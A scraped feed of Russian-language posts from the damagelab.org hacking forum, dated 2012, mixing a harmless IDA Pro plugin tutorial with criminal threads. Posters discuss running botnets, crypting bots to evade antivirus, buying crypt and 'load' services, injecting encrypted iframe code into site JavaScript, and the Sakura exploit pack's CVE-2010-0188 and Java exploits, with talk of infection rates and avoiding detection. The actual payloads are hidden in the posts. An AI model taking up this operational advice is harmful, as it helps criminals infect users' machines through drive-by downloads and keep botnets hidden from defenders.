Для пользователя №13296, насколько я помню, по Зевсу когда-то продавал 1 товарищ полный пак . А так - наверное нет потому, что тяжело иметь все сервисы сразу - и крипт, и лоады, и абуз сервера.. Это нужна какая-то команда уже.
]]> Sun, 25 Mar 2012 13:03:41 +0000 https://damagelab.org/index.php?showtopic=22273 https://damagelab.org/index.php?showtopic=22273&view=findpost&p=129052 Обзоры -> Мой опыт создания ботнета https://damagelab.org/index.php?showtopic=22273&view=findpost&p=129045 DarkDeeds:
Почему до сих пор нет человека у которого можно купить полный пак сразу и обслуживаться у него. ]]> Sat, 24 Mar 2012 23:41:47 +0000 https://damagelab.org/index.php?showtopic=22273 https://damagelab.org/index.php?showtopic=22273&view=findpost&p=129045 Обзоры -> Python+IDA https://damagelab.org/index.php?showtopic=22661&view=findpost&p=129040 p(eaZ:

Цитата:
Меня опять не хватило на еще большую оставшуюся часть, да и смысла я, честно говоря, не вижу, просмотров мало, плюсов не было - стало быть, тема нах никому здесь не интересна...

да, я тебя прекрасно понимаю =) Что касаемо плюсов, то, я думаю, многие бы поставили, но тут не всем это доступно =) (ограничение в 50 сообщений) ]]> Sat, 24 Mar 2012 15:45:23 +0000 https://damagelab.org/index.php?showtopic=22661 https://damagelab.org/index.php?showtopic=22661&view=findpost&p=129040 Обзоры -> Python+IDA https://damagelab.org/index.php?showtopic=22661&view=findpost&p=129039 salamandra:
Ой!Не надо так делать!

Очень интересно всё о чём ты пишешь.Если нет обсуждений и комментов,ещё не означает,что информация не нашла своего слушателя.Быть может просто нечего сказать.Я вот как раз делаю потуги в освоении питона +IDA и кто то ещё подчерпнёт
для себя из этого топика. ]]> Sat, 24 Mar 2012 12:29:48 +0000 https://damagelab.org/index.php?showtopic=22661 https://damagelab.org/index.php?showtopic=22661&view=findpost&p=129039 Обзоры -> Python+IDA https://damagelab.org/index.php?showtopic=22661&view=findpost&p=129038 KraZz:

Код:

#include <windows.h>
#include "include/typeinf.hpp"
#include "include/loader.hpp"
#include "include/Python.h"

#pragma comment(linker, "/entry:DllMain")

#pragma comment(lib, "python26.lib") //python 2.6
#pragma comment(lib, "ida.lib") //sdk 6.1

HWND GetWindowMessageHandle(DWORD IdaWindow)
{
//MD: 1b66134e3491139bb9eb032abda9efc0 (idag.exe)
//00443550 _TIdaWindow_MessageClearExecute proc
//00443550 mov eax, dword ptr [eax+0EFCh] <<----
//00443556 mov edx, dword ptr [eax]
//00443558 call dword ptr [edx+0DCh]
//0044355E retn
//0044355E _TIdaWindow_MessageClearExecute endp
return (HWND)*(DWORD*)((*(DWORD*)((*(DWORD*)IdaWindow)+0xEFC))+0x180);
}

static PyObject *pyida_msg_clear(PyObject *self, PyObject *args)
{
if(!PyArg_ParseTuple(args, "")) return NULL;

HWND hRichEditOutput = NULL;
DWORD IdaWindow = (DWORD)GetProcAddress(GetModuleHandle(NULL), "_IdaWindow");
if(IdaWindow)
{
hRichEditOutput = GetWindowMessageHandle(IdaWindow);
if(hRichEditOutput)
{
SetWindowText(hRichEditOutput, "");
}
}
return Py_BuildValue("I", hRichEditOutput);
}

static PyMethodDef pyidaMethods[] = {
{"msg_clear", pyida_msg_clear, METH_VARARGS, "msg clear"},
{NULL, NULL, 0, NULL}
};

int idaapi init(void)
{
Py_Initialize();

if(!Py_IsInitialized())
{
warning("Error: Py_Initialize() failed");
return PLUGIN_SKIP;
}

Py_InitModule("pyida", pyidaMethods);

return PLUGIN_KEEP;
}

void idaapi term(void)
{
Py_Finalize();
return;
}// end « term »

void idaapi run(int arg)
{
return;
}// end « run »

///////////////////////////////////////////////////////////////////////////////////////////////
char comment[] = "";
///////////////////////////////////////////////////////////////////////////////////////////////
char help[] = "";
///////////////////////////////////////////////////////////////////////////////////////////////
char name[] = "pyida Test";
///////////////////////////////////////////////////////////////////////////////////////////////
char hotkey[] = "";
///////////////////////////////////////////////////////////////////////////////////////////////
plugin_t PLUGIN =
{
IDP_INTERFACE_VERSION,
0,
init, // initialize
term, // terminate. this pointer may be NULL.
run, // invoke plugin
comment,
help, // multiline help about the plugin
name, // the preferred short name of the plugin
hotkey // the preferred hotkey to run the plugin
};

BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD fdwReason, PCONTEXT pContext)
{
return TRUE;
}// end « DllMain »

Теперь описание того что делает этот код

Нужно выставить в опциях компилятора __cdecl - это нужно для питона!

Код:

#include "include/Python.h"

Нужно обязательно добавить в проект файлы из питона 2.6 из папки include

Код:

#pragma comment(lib, "python26.lib") //python 2.6
#pragma comment(lib, "ida.lib") //sdk 6.1

Это те либы, которые надо добавить для компиляции (пока ограничимся python 2.6)

Код:

int idaapi init(void)
{
Py_Initialize();

if(!Py_IsInitialized())
{
warning("Error: Py_Initialize() failed");
return PLUGIN_SKIP;
}

Py_InitModule("pyida", pyidaMethods);

return PLUGIN_KEEP;
}

ИДА вызывает init для того чтобы плагин инициализировал какие-либо данные, вот это и есть то место где и нужно инициализировать код питона с помощью Py_Initialize
Функция Py_Initialize должна всегда вызываться первой, т. е. до использования какого-либо питоновского кода
Py_InitModule "создает пи-модуль" с нашим кодом и с именем pyida
Потом мы можем в скрипте его "вызвать" так:

Код:

import pyida

или так:

Код:

from pyida import *

Код:

static PyMethodDef pyidaMethods[] = {
{"msg_clear", pyida_msg_clear, METH_VARARGS, "msg clear"},
{NULL, NULL, 0, NULL}
};

PyMethodDef - эта структура (вернее массив структур

), которую нужно предварительно заполнить
msg_clear - это имя функции, которое мы будем писать в питоновском скрипте при ее вызове
пример:
pyida.msg_clear()

pyida_msg_clear - эта собственно та функция, которая вызовется и выполнится (подробнее чуть ниже)
об остальных параметрах этой структуры более подробно можно узнать из справки питона

Код:

static PyObject *pyida_msg_clear(PyObject *self, PyObject *args)
{
if(!PyArg_ParseTuple(args, "")) return NULL;

HWND hRichEditOutput = NULL;
DWORD IdaWindow = (DWORD)GetProcAddress(GetModuleHandle(NULL), "_IdaWindow");
if(IdaWindow)
{
hRichEditOutput = GetWindowMessageHandle(IdaWindow);
if(hRichEditOutput)
{
SetWindowText(hRichEditOutput, "");
}
}
return Py_BuildValue("I", hRichEditOutput);
}

Иногда (при частом использовании скриптов в ИДА) нужно перед запуском скрипта очистить окно лога (Output window), так как при большом потоке данных трудно что-то найти нужное среди "старого хлама", а каждый раз через меню очищать...

В ИДЕ есть экспортируемый указатель _IdaWindow на класс...
Мы этот указатель получаем и передаем в функцию GetWindowMessageHandle, а там в НЕ есть тру хаке (это нам помогает избежать написания массы нах не нужного кода) находим хендл окна Output window
Окно это ничто иное, как RichEdit поэтому шлем ему "привет" с пустой строкой, тем самым очищаем Output window
Раньше в ИДЕ там был ListBox и чтобы очистить, нужно было юзать примерно такой код:

Код:

HWND GetWindowMessageHandle(DWORD IdaWindow)
{
return (HWND)*(DWORD*)((*(DWORD*)((*(DWORD*)((*(DWORD*)((*(DWORD*)IdaWindow)+0x7D8))+0x218))+0x10))+0x180);
}
[…]
SendMessage(hListBox, LB_RESETCONTENT, 0, 0);

С ListBox`ом была масса ограничений в юзалибити, например нельзя было выделить и скопировать непосредственно нужную часть текста
С RichEdit это ограничение было снято и появились новые "фичи", к примеру, стало возможным выводить в одну строку ряд адресов и при двойном клике на нужном переходить сразу на него в окне дизасма (IDA View)...

Код:

void idaapi term(void)
{
Py_Finalize();
return;
}// end « term »

При "выгрузке" плагина деинициализируем питон, вызвав функцию Py_Finalize

Юзаем в скрипте так:

Код:

import pyida
pyida.msg_clear()

Меня опять не хватило на еще большую оставшуюся часть, да и смысла я, честно говоря, не вижу, просмотров мало, плюсов не было - стало быть, тема нах никому здесь не интересна...
]]> Sat, 24 Mar 2012 00:43:24 +0000 https://damagelab.org/index.php?showtopic=22661 https://damagelab.org/index.php?showtopic=22661&view=findpost&p=129038 Обзоры -> Вся правда о шифровании ifrаme кода https://damagelab.org/index.php?showtopic=20607&view=findpost&p=129018 Ar3s:
v3n0m1 берешь любой iframe код. Криптуешь его что бы он превратился в js код. И вот js код вставляешь в существующий js файл.
Не забудь вырезать <script> в начале и конце, если будет.

Zer0 фу как не красиво... ]]> Thu, 22 Mar 2012 09:19:00 +0000 https://damagelab.org/index.php?showtopic=20607 https://damagelab.org/index.php?showtopic=20607&view=findpost&p=129018 Обзоры -> Вся правда о шифровании ifrаme кода https://damagelab.org/index.php?showtopic=20607&view=findpost&p=129016 Zer0:
Тут реализовано https://damagelab.org/index.php?showtopic=22490&hl= ]]> Wed, 21 Mar 2012 16:08:58 +0000 https://damagelab.org/index.php?showtopic=20607 https://damagelab.org/index.php?showtopic=20607&view=findpost&p=129016 Обзоры -> Вся правда о шифровании ifrаme кода https://damagelab.org/index.php?showtopic=20607&view=findpost&p=129015 v3n0m1:
Хотел спросить. Есть возможность записать JS файл. Какой код ифрейма туда вставить и есть ли смысл криптовать?

спасибо ]]> Wed, 21 Mar 2012 16:03:32 +0000 https://damagelab.org/index.php?showtopic=20607 https://damagelab.org/index.php?showtopic=20607&view=findpost&p=129015 Обзоры -> Python+IDA https://damagelab.org/index.php?showtopic=22661&view=findpost&p=129006 KraZz:
http://habrahabr.ru/company/PENXY/blog/139655/ - Интеграция Python и C++
Гы-ы-ы, прикольно, а я как раз примерно это и хотел тут запостить %)))
Ну, собственно если эту инфу в кучу собрать, как раз можно написать что-то лучше, чем IDAPython и получить от ильфака фулку+премию %)))
Вот так элементарно изучив азы Python`а и C++ можно стать "элитой" и писссать книжки %)))
Ладно, эт даже будет интересным в плане сравнения написанных книг и вот таких статеек писаных на коленках с дрожащими руками %)))
]]> Tue, 20 Mar 2012 10:51:07 +0000 https://damagelab.org/index.php?showtopic=22661 https://damagelab.org/index.php?showtopic=22661&view=findpost&p=129006 Обзоры -> Мой опыт создания ботнета https://damagelab.org/index.php?showtopic=22273&view=findpost&p=128997 Ragnar:

Цитата:
Второй крипт дал то, что виндовс начала спрашивать "запускать ли файл без цифровой подписи"

http://www.sandersonforensics.com/Files/ZoneIdentifier.pdf

пожалуй 100500ый человек который задается этим вопросом. Надоело. Закрепите тему ]]> Mon, 19 Mar 2012 18:37:32 +0000 https://damagelab.org/index.php?showtopic=22273 https://damagelab.org/index.php?showtopic=22273&view=findpost&p=128997 Обзоры -> Мой опыт создания ботнета https://damagelab.org/index.php?showtopic=22273&view=findpost&p=128995 cube:

Цитата:
это смешно, обойти фаерволы, и не обойти брандмауэр

Действительно. ]]> Mon, 19 Mar 2012 10:53:24 +0000 https://damagelab.org/index.php?showtopic=22273 https://damagelab.org/index.php?showtopic=22273&view=findpost&p=128995 Обзоры -> Мой опыт создания ботнета https://damagelab.org/index.php?showtopic=22273&view=findpost&p=128993 Quake3:
Я уже упоминал это, но повторюсь еще раз. Большим минусом ботнетов в наше время являются некачественные крипторы. Это проблема, которую хз как решать. Если даже с лоадами в 100500 рук можно бороться, снабдив бота каким-то мини-авером (и удалять популярные оптимы да гботы), то что делать с гуанокриптом, честно говоря, я не знаю.

Например, взял я бот у кодера, бот имеет разные обходы (uac, аверов). Но ес-но,через какое-то время он начинает палится, особенно если бот является, так сказать, "серийным продуктом", а автор не занимается чисткой. Приходится искать крипторов. И что имеем в итоге? Вот два случая крипта моего бота.

1ый - бот не палится ничем, но выскакивает окно UAC. До крипта этого не было.

2ой - бот не палится ничем, но его блокирует стандартный брандамауэр винды. Опять же, до крипта такого не было (это смешно, обойти фаерволы, и не обойти брандмауэр).

И какой выход в этой ситуации? Кроме утопичных для не-специалиста советов вида "напиши свой бот, и перекомпилируй его, чтобы сбить детект" и "напиши свой криптор", вариантов нет. Разве что искать каких-то приват-зиродей криптовщиков, услуги которых, ес-но, будут весьма недешевыми.

Учитывая какие сложности сейчас представляет реализовать криптор, сделать что-то грамотное могут только редкие специалисты. Которые предпочитают работать на приваты, а не оказывать услуги за 15 долларов всем школо-ботоводам. ]]> Sun, 18 Mar 2012 20:45:23 +0000 https://damagelab.org/index.php?showtopic=22273 https://damagelab.org/index.php?showtopic=22273&view=findpost&p=128993 Обзоры -> Python+IDA https://damagelab.org/index.php?showtopic=22661&view=findpost&p=128991 KraZz:

Цитата:
Apocalypse пишет:
Деобфускатор или декомпилятор ВМПрота?

Не-не, эт инфа приватна и релизить я ее точно не буду, может потом когда уже станет неактуальна только в качестве экспоната

ЗЫ: все просто дальше некуда и инфа рассчитана для начинающих и вообще просто показать тем, кто еще не знает, что существует такой вариант.. + обновить инфу, а то там в книге (Глава 11 - IDAPython) написано про питон для версии 5.2, слишком поздновато как-то для такого перевода будет

%)))

Я НЕ хотел бы здесь рассказывать об.. вернее разжевывать и переписывать (кстати, что делают в большинстве книг) то, что хорошо описано в официальной "документации" к ИДЕ , а хочу показать как относительно просто можно добавить свой код в питон и потом его юзать в скриптах
Иногда бывает, что некоторые вещи кажутся очень страшными и сложными для изучения на первый взгляд, но потом может оказаться, что все проще некуда
Первый шаг - это разбить сложную задачу на несколько простых
Самый простой шаг - это создать базовый код, впоследствии который мы будем "допиливать"
В ИДЕ есть шаблон плагина, с него мы и начнем:

Код:

#include <windows.h>

#include "include/typeinf.hpp"
#include "include/loader.hpp"

#pragma comment(linker, "/entry:DllMain")

int idaapi init(void)
{
return PLUGIN_KEEP;
}// end « init »

void idaapi term(void)
{
return;
}// end « term »

void idaapi run(int arg)
{
msg("Test\n");
return;
}// end « run »

///////////////////////////////////////////////////////////////////////////////////////////////
char comment[] = "";
///////////////////////////////////////////////////////////////////////////////////////////////
char help[] = "";
///////////////////////////////////////////////////////////////////////////////////////////////
char name[] = "Python Test";
///////////////////////////////////////////////////////////////////////////////////////////////
char hotkey[] = "";
///////////////////////////////////////////////////////////////////////////////////////////////
plugin_t PLUGIN =
{
IDP_INTERFACE_VERSION,
0,
init, // initialize
term, // terminate. this pointer may be NULL.
run, // invoke plugin
comment,
help, // multiline help about the plugin
name, // the preferred short name of the plugin
hotkey // the preferred hotkey to run the plugin
};

BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD fdwReason, PCONTEXT pContext)
{
return TRUE;
}// end « DllMain »

И def для экспорта

Код:

EXPORTS
PLUGIN

Создадим в студии проект для DLL и определим в свойствах проекта (Preprocessor Definitions) __IDP__ и __NT__
И добавим в проект файлы из SDK 6.1 из папки include
Еще желательно установить плагин для студии: (чтобы удобнее было)
http://exelab.ru/download.php?action=get&n=OTQw - Whole Tomato Visual Assist X v10.6.1859.0 скачать
Из кода видно, что все проще некуда
Компилим и копируем в директорию ИДЫ с плагинами, можно еще проще сделать и автоматизировать процесс, прописав в студии в свойствах проекта в Build Events->Post-Build Event в поле Command Line команду: (для примера)
COPY "С:\IDA6.1\Plugins\pyida\pyida.dll" "С:\Program Files\IDA\plugins\pyida.plw" /Y /B
Теперь откроем в ИДЕ 6.1 какой-нибудь тестовый test.idb и лезем в меню Edit->Plugins->Python Test и запускаем
В результате в окне Output window ИДЫ появится слово Test
Стало быть, первый этап пройден и у нас есть базовый рабочий код..
Важно довести стадию компиляции до автоматизма, чтобы не возникало ошибок, и почитать обязательно что-нибудь (http://www.opensc.ws/showthread.php?t=18471 - IDA Pro Book, 2nd Edition - 2011), чтобы иметь базовые знания, в принципе вся основная инфа находится в комментариях в коде SDK ИДЫ, а книги по ИДЕ я хз. для чего вообще нужны...

P. S.
Следующую часть выложу позже, чет опять меня на все не хватило.. %)))
]]> Sun, 18 Mar 2012 07:29:15 +0000 https://damagelab.org/index.php?showtopic=22661 https://damagelab.org/index.php?showtopic=22661&view=findpost&p=128991 Обзоры -> Python+IDA https://damagelab.org/index.php?showtopic=22661&view=findpost&p=128984 Apocalypse:
Деобфускатор или декомпилятор ВМПрота?

]]> Sat, 17 Mar 2012 12:09:14 +0000 https://damagelab.org/index.php?showtopic=22661 https://damagelab.org/index.php?showtopic=22661&view=findpost&p=128984 Обзоры -> Python+IDA https://damagelab.org/index.php?showtopic=22661&view=findpost&p=128982 KraZz:
Gray Hat Python
Я из нищебродской (в прошлом aka буржуйской) литературы читаю только оффдокументацию
И эта "книга" тоже не стала исключением, но...
Как-то случайно наткнулся на вот это:
http://forum.reverse4you.org/showthread.php?t=1186
Очень понравилось оформление, да и вообще с удовольствием почитал перевод
Но разочаровало то, что у нас тупо (в большинстве случаев), на что способны так это сделать перевод.. при этом бывает, что русский парень пишет на инглеше занятное чтиво, а потом с этого ломаного инглиша переводят на наш русский %))))
Короче, когда смотрел, обратил внимание на дату книги 2009 - эт когда ее писали, был 2008
И вот получается, какбы.. актуальна тема (раз переводят) и значит нужно
Вот и вспомнил, что когда-то сам начинал и че-то там...
Решил написать об этом здесь, скажу сразу "преамбула" начала здесь:
Скрытый текст!
А это какбэ должно было быть продолжением, писалось для версии ИДЫ 5.1 или 5.2 (точно не помню) но "релиза" так и не было, и вот немного подшаманил и причесал под "новую" версию ИДЫ 6.1, решил выложить здесь - может кому-то и пригодится...

Стал замечать значительное количество постов советующих и нахваливающих Python и это естественно радует, плюсов миллион с тележкой и наверное, всех преимуществ не сосчитать, но есть и те кто (просто уверен) никак не может себя заставить подсесть на Python
Я тоже был таким, никак не хотел пересаживаться на Python, я кодил в то время на lua и мне казалось, что такой монстр как Python не достоин моего внимания
Но как-то раз случайно попал на античат, а там есть девочко с мужским именем, ну вот она рассказывала в статье про Python и мне так стало обидно - мля, что "какая-та баба" знает и умеет кодить на питоне, а мну как последний парень на деревне еще танцевать с бубном не научился...

Предположим что у вас в ИДЕ 6.1 уже установлен плагин IDAPython
Но если вдруг еще нет 0_o, то скачать соответствующую версию можно здесь:
http://code.google.com/p/idapython/downloads/list
и здесь соответствующую версию Python`а:
http://www.python.org/ftp/python/
как установить?, читаем в файле README.txt (раздел INSTALLATION FROM BINARIES) + гугл

Я знал, что меня на все сразу не хватит, поэтому решил сразу запостить начало, а на днях выложу здесь вторую часть..
ЗЫ: Кто отгадает, про что будет написано в статье - с меня "пять золотых монеток"+"конфетко" %)))
]]> Sat, 17 Mar 2012 07:15:23 +0000 https://damagelab.org/index.php?showtopic=22661 https://damagelab.org/index.php?showtopic=22661&view=findpost&p=128982 Обзоры -> Sakura exploit pack https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128639 Ar3s:
По просьбе автора - поднял хайд. ]]> Thu, 23 Feb 2012 15:18:55 +0000 https://damagelab.org/index.php?showtopic=22595 https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128639 Обзоры -> Sakura exploit pack https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128637 Gdark:

Цитата:
can someone PM the sakura's author jid/icq to me ?

tq

sakura's reception is closed ]]> Thu, 23 Feb 2012 14:54:59 +0000 https://damagelab.org/index.php?showtopic=22595 https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128637 Обзоры -> Sakura exploit pack https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128636 irvinedean:
can someone PM the sakura's author jid/icq to me ?

tq ]]> Thu, 23 Feb 2012 14:47:24 +0000 https://damagelab.org/index.php?showtopic=22595 https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128636 Книги и мануалы -> Журнал "Хакер" https://damagelab.org/index.php?showtopic=17102&view=findpost&p=128600 AKella:

Февраль 2012

Скачать с rapidshare.ru ]]> Tue, 21 Feb 2012 12:59:34 +0000 https://damagelab.org/index.php?showtopic=17102 https://damagelab.org/index.php?showtopic=17102&view=findpost&p=128600 Обзоры -> Sakura exploit pack https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128550 Mr._Zed:
ИМХО, отсутствие плагин детекта здесь уместно, тем более, что Ксио заявлял о постоянных чистках. Хотелось бы услышать мнение хоть одного нынешнего клиента пака

]]> Thu, 16 Feb 2012 15:34:33 +0000 https://damagelab.org/index.php?showtopic=22595 https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128550 Обзоры -> Sakura exploit pack https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128540 Ragnar:
Отсутствие плагиндетекта сделано для экономии времени, что вполне мб оправдано с учетом сео траффа, поэтому выпады в сторону автора немного неуместны, каждый сам решает за счет чего повысить пробив. ]]> Wed, 15 Feb 2012 18:38:55 +0000 https://damagelab.org/index.php?showtopic=22595 https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128540 Обзоры -> Sakura exploit pack https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128537 xlt:

Цитата:
Имхо тут и разгребать то нечего было. Очередной тупой говнопак (((.
Прецендент с детектом плагинов - это актуально ибо многие браузеры при отсутствии у них на борту нужных плагинов орут об этом юзеру или вообще крэшат всю выдачу нах ))). Так что палка о двух концах.

Отсутствие плагина, никак не может крешить выдачу. Вы чето преувеличиваете и мифы тут создаете...
Реальные замеры показывают, что пробив без плагин дектекта выше...
А чтобы не выдавалось тем у кого плагин не установлен можно проверять
navigator.JavaEnabled...
А плагин детект бывает, что не может определить версию джавы из-за просадок по пробиву... ]]> Wed, 15 Feb 2012 12:44:09 +0000 https://damagelab.org/index.php?showtopic=22595 https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128537 Обзоры -> Sakura exploit pack https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128536 Gdark:

Цитата:
Имхо тут и разгребать то нечего было. Очередной тупой говнопак (((.

Сделай "умный" пак или хотя бы аргументировал.

Цитата:
Прецендент с детектом плагинов - это актуально ибо многие браузеры при отсутствии у них на борту нужных плагинов орут об этом юзеру или вообще крэшат всю выдачу нах ))). Так что палка о двух концах.

Если все чисто и все работает какая нафиг разница, что и как выдется. Я вот этого не пойму. Не вы же чистите. Сто лет выдавали так и выдают до сих пор. А вы дальше бх ничего не видите.

]]> Wed, 15 Feb 2012 12:13:19 +0000 https://damagelab.org/index.php?showtopic=22595 https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128536 Обзоры -> Sakura exploit pack https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128535 TrueUser:
Имхо тут и разгребать то нечего было. Очередной тупой говнопак (((.
Прецендент с детектом плагинов - это актуально ибо многие браузеры при отсутствии у них на борту нужных плагинов орут об этом юзеру или вообще крэшат всю выдачу нах ))). Так что палка о двух концах. ]]> Wed, 15 Feb 2012 11:45:52 +0000 https://damagelab.org/index.php?showtopic=22595 https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128535 Обзоры -> Sakura exploit pack https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128533 xlt:

Цитата:
И так же быстро палится? Мда, это профессиональный подход...

Ar3s это бред. Как быстро спалит зависит лишь от профессионализма криптора. У меня вот все клиенты крупные минимум 200к в сутки сливают, и при таком методе выдачи живут по 0лям чистыми около недели и пробив выше. А у кого-то и с плагин детектом палится уже через 2-3 часа... все относительно...
Во вторых сам скрипт плагин дектекта весит 30кб, что при выдачи сверху увеличивает ее размер до 70-150кб. Что сказывается на скорости загрузки и расшифровки выдачи, а соответственно на пробиве. А у некоторых еще JS крипты медленные и грузят браузер. А еще плагин детект не корректно сравнивает версии, в джаве есть альфа и бета версии еще, который детектятся как 1.6.0.30_a14.
Поэтому я считаю, что автор сакуры правильно сделал. ]]> Wed, 15 Feb 2012 09:32:49 +0000 https://damagelab.org/index.php?showtopic=22595 https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128533 Обзоры -> Sakura exploit pack https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128529 Ar3s:
И так же быстро палится? Мда, это профессиональный подход... ]]> Tue, 14 Feb 2012 09:01:11 +0000 https://damagelab.org/index.php?showtopic=22595 https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128529 Обзоры -> Sakura exploit pack https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128528 Gdark:
Ну и зачем было разбирать =\

Цитата:
P.S. Хотелось бы услышать мнения форумчан по поводу такого подхода в выдаче сплоитов.

Выдача себя оправдала и приносит больший эффект нежели кривой плагиндетект. ]]> Tue, 14 Feb 2012 05:43:11 +0000 https://damagelab.org/index.php?showtopic=22595 https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128528 Обзоры -> Sakura exploit pack https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128524 GOONER:

Всем привет! Сегодня решил опубликовать небольшой обзор новой связки сплоитов Sakura exploit pack!
Хотя я уже давно видел топ об аренде , и скрины статистики на блоге xylibox, но только недавно наткнулся на живой сэмпл в трекере

Итак открыв стандартный набор утилит для ковыряния связок, начнемс наше исследование
под User-agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Скрытый текст!
получаем выдачу связки index.txt

Сразу же возникают вопросы-а где же проверка уязвимых версий плагинов?Зачем лишний раз палить сплоиты?
Возможно, лучше выдавать сплоиты средствами JavaScript?
Ладно, возьмемся за декод сплоентов, которые я поснимал:

lsff.pdf - libtiff CVE-2010-0188
rhin.jar - java rhino CVE-2011-3544
Loo.jar - java OBE CVE-2010-0840

Начнем с rhin.jar - как видим апплету передается параметр:
Скрытый текст!

Это линк на скачку ехе, за его расшифровку отвечает участок кода:
Скрытый текст!
Декод на JS:
Скрытый текст!
или на Java:
Скрытый текст!
Получаем:
Скрытый текст!
Приступим к Loo.jar, тут также апплету передается шифрованный линк на скачку ехе
Скрытый текст!

Скрытый текст!
Тем же способом декодируем линк:
Скрытый текст!
Далее в очереди - lsff.pdf
Для анализа будем использовать PDFStreamsDumper

Нас интересует 8 0 obj, который под флатом
Скрипт для декода pdfdec.js

Сам js в decoded.txt
ШК в либтифе поксорен

Вот, собственно, и всё.
===================================================================
P.S. Хотелось бы услышать мнения форумчан по поводу такого подхода в выдаче сплоитов.
===================================================================

ТУТ
pass:DaMaGeLaB
[/HIDE]-->Скрытый текст! ]]> Mon, 13 Feb 2012 22:38:37 +0000 https://damagelab.org/index.php?showtopic=22595 https://damagelab.org/index.php?showtopic=22595&view=findpost&p=128524 Обзоры -> Как стать ниндзей https://damagelab.org/index.php?showtopic=22554&view=findpost&p=128454 higaru:
Для пользователя №7824
да все писатели запускателей блокнотов это знают или догадываюся ) ]]> Thu, 09 Feb 2012 19:24:52 +0000 https://damagelab.org/index.php?showtopic=22554 https://damagelab.org/index.php?showtopic=22554&view=findpost&p=128454 Обзоры -> Как стать ниндзей https://damagelab.org/index.php?showtopic=22554&view=findpost&p=128450 demien:
главное чтобы на eip шеллкод попадал после переполнения) а дойти до этого не так уж и просто бывает ;( ]]> Thu, 09 Feb 2012 16:11:44 +0000 https://damagelab.org/index.php?showtopic=22554 https://damagelab.org/index.php?showtopic=22554&view=findpost&p=128450 Обзоры -> Как стать ниндзей https://damagelab.org/index.php?showtopic=22554&view=findpost&p=128447 higaru:
Для пользователя №7824
о сколько парился над тем, что инфа улетучивалась из быстрой памяти =) но уже понял, что это не страшно в конце концов =) Главное общая шаристость и опыт)) ]]> Thu, 09 Feb 2012 15:20:04 +0000 https://damagelab.org/index.php?showtopic=22554 https://damagelab.org/index.php?showtopic=22554&view=findpost&p=128447 Обзоры -> Как стать ниндзей https://damagelab.org/index.php?showtopic=22554&view=findpost&p=128445 demien:
2higaru молодец!
то что опыт это наше все, основная мысль статьи лишний раз доказывает мою точку зрения

2Barack

Цитата:
p.s. только не показывайте ее Владику

по предыдущим его постам оч хорошо понимаю суть вашего предупреждения

2Vladik

Цитата:
Почему мне не показывать ?

Я уже успел её прочитать и узнал для себя пару полезных вещей. (правда тех о чем мне уже говорили , проосто еще раз убедился в них)

потому что до поиска уязвимостей в приложениях тебе еще оч далеко, сначала выкури советы с https://damagelab.org/index.php?showtopic=22435

]]> Thu, 09 Feb 2012 14:12:36 +0000 https://damagelab.org/index.php?showtopic=22554 https://damagelab.org/index.php?showtopic=22554&view=findpost&p=128445